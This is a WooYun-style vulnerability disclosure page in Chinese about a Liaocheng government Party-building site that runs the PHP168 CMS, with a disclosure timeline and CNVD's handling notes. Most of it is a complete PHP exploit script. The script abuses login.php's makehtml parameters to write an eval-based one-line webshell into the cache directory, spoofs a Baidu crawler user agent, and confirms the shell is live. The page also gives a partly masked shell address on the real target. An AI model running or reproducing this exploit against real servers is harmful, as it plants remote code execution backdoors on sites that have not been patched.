乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-12: 细节已通知厂商并且等待厂商处理中 2015-08-12: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-22: 细节向核心白帽子及相关领域专家公开 2015-09-01: 细节向普通白帽子公开 2015-09-11: 细节向实习白帽子公开 2015-09-26: 细节向公众公开
聊城机关党建网getshell使用php168的cms 漏洞未修复
漏洞exp
<?php/** * Name: php168_getshell.php */print_r('+------------------------------------------------------+ PHP168 login.php GetShell EXP Time:2013-11-19+------------------------------------------------------+');if ($argc < 3) { print_r('+------------------------------------------------------+Useage: php ' . $argv[0] . ' host pathHost: target server (ip/hostname)Path: path of login.phpExample: php ' . $argv[0] . ' localhost /php168+------------------------------------------------------+ '); exit;}error_reporting(7);$host = $argv[1];$path = $argv[2];$shell = 'safe.php';$code = '<?php%20@eval($_POST[safe])?>';$url = "http://$host/$path/cache/$shell";echo '正在GetShell,请稍候……' . "\n\n";send_pack();shell_ok($url);//判断shell是否写入成功function shell_ok($url){ $headers = get_headers($url); if (strpos($headers[0], 'HTTP/1.1 200 OK') === 0) { echo '恭喜大爷,一句话写入成功,密码为:safe' . "\n\n" . 'Shell地址为:' . $url . "\n"; } else { echo 'Shell写入失败,请尝试更换目录测试。' . "\n"; }}//发送数据包函数function send_pack(){ global $host, $path, $shell, $code; $data = "GET " . $path . "/login.php?makehtml=1&chdb[htmlname]=$shell&chdb[path]=cache&content=$code HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "User-Agent: BaiduSpider\r\n"; $data .= "Connection: Close\r\n\r\n"; $fp = @fsockopen($host, 80, $errno, $errstr, 30); //echo ini_get('default_socket_timeout');//默认超时时间为60秒 if (!$fp) { echo $errno . '-->' . $errstr . "\n"; exit('Could not connect to: ' . $host); } else { fwrite($fp, $data); $back = ''; while (!feof($fp)) { $back .= fread($fp, 1024); } fclose($fp); } return $back;}?>
shell地址:http://**.**.**.**/cache/wooyun.php
你们更专业
危害等级:中
漏洞Rank:7
确认时间:2015-08-12 14:22
CNVD未直接复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无